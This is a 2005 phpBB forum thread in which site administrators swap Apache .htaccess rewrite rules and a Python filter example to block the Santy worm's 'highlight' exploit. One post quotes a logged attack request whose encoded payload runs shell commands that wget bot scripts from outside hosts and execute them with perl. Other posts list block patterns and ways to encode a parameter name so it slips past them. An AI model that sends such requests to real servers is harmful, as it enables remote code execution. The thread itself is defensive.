Posted: Fri Jan 07, 2005 8:56 pm
by Joe User
The [R,L] results in a 302 response...

Posted: Fri Jan 07, 2005 9:05 pm
by john_r
Hi

Yes, I know that, but why should it only send some lines to 302 while others get 200?

After the last post I changed .htaccess to

RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20 [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)echr(.*) [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^libwww-perl/ [NC,OR]
RewriteCond %{HTTP_USER_AGENT} lwp [NC,OR]
RewriteCond %{QUERY_STRING} ^(.*)esystem(.*)
RewriteRule ^.*$ http://127.0.0.1 [R,L]

and later checking my logs, see that requests to

/phpbb/posting.php
/phpbb/profile.php
/phpbb/privmsg.php

still get re-routed, i.e. 302. All other requests get 200.

So I have banned those lines in robots.txt,

but I would like to know why only those requests get re-routed.

Rgds

Posted: Fri Jan 07, 2005 11:02 pm
by Taipo
Why focus on the occurrence of 'highlight=%2527' in a GET request string when it is in fact the occurrence of '%2527' alone that is of concern? As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get through the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='
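An added illustration of Taipo's point (example code written for this page, not something posted in the thread): a RewriteCond on the literal string highlight=%2527 is compared against the raw query string, so a request whose parameter name is percent-encoded slips past it, while decoding the parameter name and then looking for a quote that is still percent-encoded in the value (the double encoding the highlight bug relied on before 2.0.11) catches both spellings and leaves an ordinary apostrophe alone. The request lines below are constructed samples.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines for this example; not taken from the thread's logs.
REQUESTS = {
    # the form the thread's RewriteCond catches: literal "highlight=%2527"
    "plain": "GET /viewtopic.php?t=1&highlight=%2527.passthru(1).%2527 HTTP/1.1",
    # same payload with the parameter *name* percent-encoded, as Taipo describes
    "obfuscated": "GET /viewtopic.php?t=1&%68%69%67%68%6C%69%67%68%74=%2527.passthru(1).%2527 HTTP/1.1",
    # an ordinary search term with an apostrophe, encoded once by the browser
    "benign": "GET /viewtopic.php?t=1&highlight=it%27s HTTP/1.1",
}

# The literal pattern used by the .htaccess rules quoted in the thread.
NAIVE = re.compile(r"highlight=%2527", re.I)


def naive_match(request_line):
    """Mimics the thread's rule: fires only on the exact bytes 'highlight=%2527'."""
    return NAIVE.search(request_line) is not None


def decode_once(text):
    """One round of percent-decoding, the same thing the server does with a query string."""
    return unquote(text)


def query_params(request_line):
    """Map decoded, lower-cased parameter names to their values exactly as sent."""
    target = request_line.split(maxsplit=2)[1]   # "/viewtopic.php?t=1&..."
    query = target.partition("?")[2]
    params = {}
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        params[decode_once(name).lower()] = value  # decode the name, keep the value raw
    return params


def double_encoded_quote_in_highlight(request_line):
    """True when the highlight value still carries a percent-encoded quote (%27 or %22)
    after one decode, i.e. it was sent double-encoded so that a second decode in the
    application would turn it into a raw quote after escaping had already run."""
    value = query_params(request_line).get("highlight", "")
    return re.search(r"%2[27]", decode_once(value), re.I) is not None
```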

Posted: Sat Jan 08, 2005 8:24 am
by bmer
Taipo wrote: Why focus on the occurrence of 'highlight=%2527' in a GET request string when it is in fact the occurrence of '%2527' alone that is of concern? As tanrek mentioned, a masked variant of 'highlight' like h%69ghl%69ght or %68%69%67%68%6C%69%67%68%74 will get through the net.

Decode this: %68%69%67%68%6C%69%67%68%74%3D%2527

Decodes to: highlight=%27
or highlight='


You guys are all talking a foreign language to me. :lol:

Here is my problem. I upgraded my forum to 2.0.11 and it seemed to cut down on guest access, but I still have around 4-10 guests all the time yet. My host is running PHP 4.3.10. I tried adding that .htaccess file at the top of this post, but get a critical error. This is driving me nuts. My host isn't much help. What can I do? Can someone help? I get dizzy reading through all these posts. :lol:

Posted: Mon Jan 10, 2005 3:53 pm
by px1369
I just want to confirm that this htaccess modification will fix my troubles?

RewriteEngine On

# prevent access from santy webworm a-e
RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=\%65\%63\%68 [OR]
RewriteCond %{QUERY_STRING} ^(.*)rush=echo [OR]
RewriteCond %{QUERY_STRING} ^(.*)wget\%20
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent pre php 4.3.10 bug
# (the stray "%" after %{HTTP_COOKIE} in the original line was a typo)
RewriteCond %{HTTP_COOKIE} s:(.*):\%22test1\%22\%3b
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

# prevent perl user agent (most often used by santy)
RewriteCond %{HTTP_USER_AGENT} ^lwp.* [NC]
RewriteRule ^.*$ http://127.0.0.1/ [R,L]

I have had several hundred different IPs attempt to access my server and one account that has thousands of visitors daily is still receiving these:

/viewtopic.php?t=125&rush=%65%63%68%6F%20%5F%53%54%41%52%54%5F%3B%20cd%20/tmp;mkdir%20.temp22;cd%20.temp22;wget%20http://www.quasi-sane.com/pics/bot.htm;wget%20http://weblicious.com/.notes/ssh2.htm;perl%20ssh2.htm;rm%20ssh.htm;perl%20bot.htm;rm%20bot.htm%3B%20%65%63%68%6F%20%5F%45%4E%44%5F&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5F%47%45%54%5F%56%41%52%53%5B%72%75%73%68%5D%29.%2527'; HTTP/1.1

Mod_Security-Message:
Access denied with code 406. Pattern match "wget " at THE_REQUEST.

Thanx

Posted: Tue Jan 11, 2005 10:11 pm
by Mikalee
[Edit - problem corrected, server issue]

Posted: Thu Jan 13, 2005 8:12 am
by jsprague
Hello,

Just wondering what the following code listed in the .htaccess examples will do.

RewriteRule ^.*$ http://127.0.0.1/ [R,L]

What does this line do?

Thanks!

Posted: Thu Jan 13, 2005 9:53 am
by Joe User
jsprague wrote:

RewriteRule ^.*$ http://127.0.0.1/ [R,L]

What does this line do?


It redirects the requests back to the source system ;)

Posted: Sat Jan 22, 2005 10:26 am
by FuZiWuZi
Hello,

If I buy a new hosting and download a new version of phpbb do I have to run the patch for this worm? Or is it already done?

thx,
Fuz

Posted: Sat Jan 22, 2005 3:55 pm
by -=ORC_The_Dude=-
-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


win98se supports the *.htaccess extension. It doesn't allow me to rename a file as .htaccess without anything before the dot.



But no one answers the question...

Is it possible to get a zip containing the .htaccess file itself?

Posted: Sun Jan 23, 2005 3:08 am
by Psychotic_Carp
-=ORC_The_Dude=- wrote:
-jm- wrote:
thecoalman wrote: htacess.txt (not sure if windows supports long file extensions)


win98se supports the *.htaccess extension. It doesn't allow me to rename a file as .htaccess without anything before the dot.



But no one answers the question...

Is it possible to get a zip containing the .htaccess file itself?


Try this:

There is already a .htaccess file in your phpBB folder (the cache folder).

Download it to your desktop, open it with Notepad or get HTML-Kit (google it), paste in the code and save it, then upload it where you want it.


What I want to know is: what is the best code to currently use, and which folders are the best to put it in? (Replace the one in the cache folder? And can I place the file in multiple locations?)

Posted: Mon Jan 24, 2005 6:05 pm
by damiel
whit wrote: You could probably get away with:

RewriteEngine On
RewriteBase /

RewriteCond %{QUERY_STRING} ^(.*)highlight=\%2527 [OR]
RewriteCond %{HTTP_USER_AGENT} ^lwp [NC]
RewriteRule ^.*$ - [F,L]

The highlight line catches, I think, all the variants of Santy I've logged. The next catches all the attempts at custom hacks from Perl I've seen so far (everything starting with LWP or lwp; the "NC" means "no case"). You can at the very least get rid of all the LWP and lwp lines but that one.


I realized today that my forum was being hit by these stupid worms (far more "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel

Posted: Mon Jan 24, 2005 6:31 pm
by damiel
BTW, in case anyone cares, I write .htaccess scripts in Windows by uploading the file as htaccess.txt (or, really, any extension doesn't make a difference). Then, while in FTP, I rename the file as .htaccess.

It's really simple.

Damiel

Posted: Mon Jan 24, 2005 7:53 pm
by jsundqui
damiel wrote: I realized today that my forum was being hit by these stupid worms (far more "guests" than usual, and then looking at the "latest visitors" stats in CPanel, I realized that they were all trying to use the "highlight" exploit). I wasn't worried about getting trashed anymore, because I had upgraded to phpBB 2.0.11 a month ago and PHP was upgraded to 4.3.10 by the host. However, I was worried about the bandwidth usage, and I just wanted to say that this .htaccess script worked like a charm. Very soon after I added it, the "guests" went away.

Damiel


It seems the worms kicked it up a notch today at my site as well. I did the mod_rewrite changes to .htaccess a while ago so they all get 403'd, but I was only getting worm attempts every few minutes or so, and from what seemed to be hijacked cable/DSL home lusers. But today it has cranked up to every 10 seconds or so, and they seem to be coming from hosting outfits. This is all based on unscientific sampling of IPs to look up, but the hit rate is definitely a huge spike today.

BTW, I've been getting some users registering from Russia that seem intent on breaking in. They got in a while ago, probably by reading config.php before I upgraded to 2.0.11 (and I had the same password for the db as the site, since changed). Curiously, the site was not defaced as was done with other Santy attacks, although my portal page was eventually hacked; no other files were deleted, though. But it is curious that they needed to sign up as users to do this. Is there another crack out there not yet discovered or reported?